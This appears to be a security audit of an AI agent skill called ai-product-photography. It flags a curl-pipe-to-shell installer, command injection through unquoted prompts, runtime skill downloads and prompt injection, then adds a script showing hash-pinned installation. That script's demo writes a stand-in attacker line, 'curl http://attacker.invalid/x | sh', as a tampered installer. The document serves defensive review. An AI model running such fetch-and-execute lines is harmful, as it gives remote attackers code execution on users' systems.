ai-product-photography
Fail
Audited by Gen Agent Trust Hub on Feb 19, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The skill documentation instructs users to execute `curl -fsSL https://cli.inference.sh | sh`. This pattern downloads a shell script from an external domain the user does not control and pipes it straight into a shell, with no checksum, signature or manual inspection; the server owner can therefore run arbitrary code on the host with the user's privileges.
- COMMAND_EXECUTION (MEDIUM): The skill requires permission to run bash commands matching `infsh *`. The provided examples are multi-line shell scripts with loops and variable interpolation; where a prompt or filename is expanded unquoted into a command line, shell metacharacters in that input (`;`, `|`, `$(...)`, backticks) become additional commands rather than data.
- EXTERNAL_DOWNLOADS (MEDIUM): The 'Related Skills' section suggests running `npx skills add` to download and install multiple additional skills from an external repository at runtime, extending the trust boundary to whatever that repository serves at install time.
- PROMPT_INJECTION (LOW): The skill ingests untrusted user input as image-generation prompts without sanitization or boundary markers, so it is exposed to indirect prompt injection. Image generation is the primary capability, but the agent's environment (which allows bash and file writes) makes this a real attack surface if the agent processes the resulting tool outputs.
- Ingestion points: Prompt field in `infsh app run` commands.
- Boundary markers: Absent; prompt strings are interpolated directly into shell arguments.
- Capability inventory: File writing, bash execution, and network access via the CLI tool.
- Sanitization: None provided in the implementation examples.
Recommendations
- HIGH: Downloads and executes remote code from: https://cli.inference.sh - DO NOT USE without thorough review
- AI detected serious security threats
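For reviewers who still need the CLI, the following script is an added example of how to replace `curl ... | sh` with download, pin, inspect, then run. It is not part of the skill or of the inference.sh installer; the `fetch_installer` function shows the real download call but is not executed here, and the demo section uses a constructed stub script and a hash computed locally so it runs offline. In practice the pinned SHA-256 comes from the vendor's release notes or a previously reviewed copy, never from the same download.

```shell
#!/bin/sh
# Added example: safer replacement for `curl -fsSL https://cli.inference.sh | sh`.
# Download to a file, verify a pinned SHA-256, read it, and only then execute.
set -eu

# sha256_of FILE: print the hex digest (coreutils or macOS fallback).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_installer FILE EXPECTED_SHA256: 0 if the digest matches, 1 otherwise.
verify_installer() {
  file=$1; expected=$2
  actual=$(sha256_of "$file")
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  printf 'hash mismatch for %s\n  expected %s\n  got      %s\n' \
    "$file" "$expected" "$actual" >&2
  return 1
}

# fetch_installer URL DEST: download to a file, never into a shell.
# Real network call; not run in the demo below.
fetch_installer() {
  curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
}

# install_from URL EXPECTED_SHA256: the full flow a reviewer would follow.
install_from() {
  tmp=$(mktemp)
  fetch_installer "$1" "$tmp"
  verify_installer "$tmp" "$2"
  "${PAGER:-less}" "$tmp"        # read the script before running it
  sh "$tmp"
  rm -f "$tmp"
}

# --- constructed demo (offline; stub installer, not the vendor's) ---
demo_dir=$(mktemp -d)
good=$demo_dir/install.sh
printf '#!/bin/sh\necho "installing infsh (constructed stub)"\n' > "$good"
pinned=$(sha256_of "$good")   # stands in for a digest taken from a trusted source

verify_installer "$good" "$pinned" && echo "verified: safe to inspect and run"

tampered=$demo_dir/tampered.sh
printf '#!/bin/sh\ncurl http://attacker.invalid/x | sh\n' > "$tampered"
if verify_installer "$tampered" "$pinned"; then
  echo "BUG: tampered script accepted"
else
  echo "rejected: tampered script does not match the pinned digest"
fi
rm -rf "$demo_dir"
```

The pinned digest is what turns "trust whatever the server sends today" into "trust the exact bytes I reviewed"; if the vendor publishes signed releases, checking the signature belongs in `verify_installer` as well.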
Audit Metadata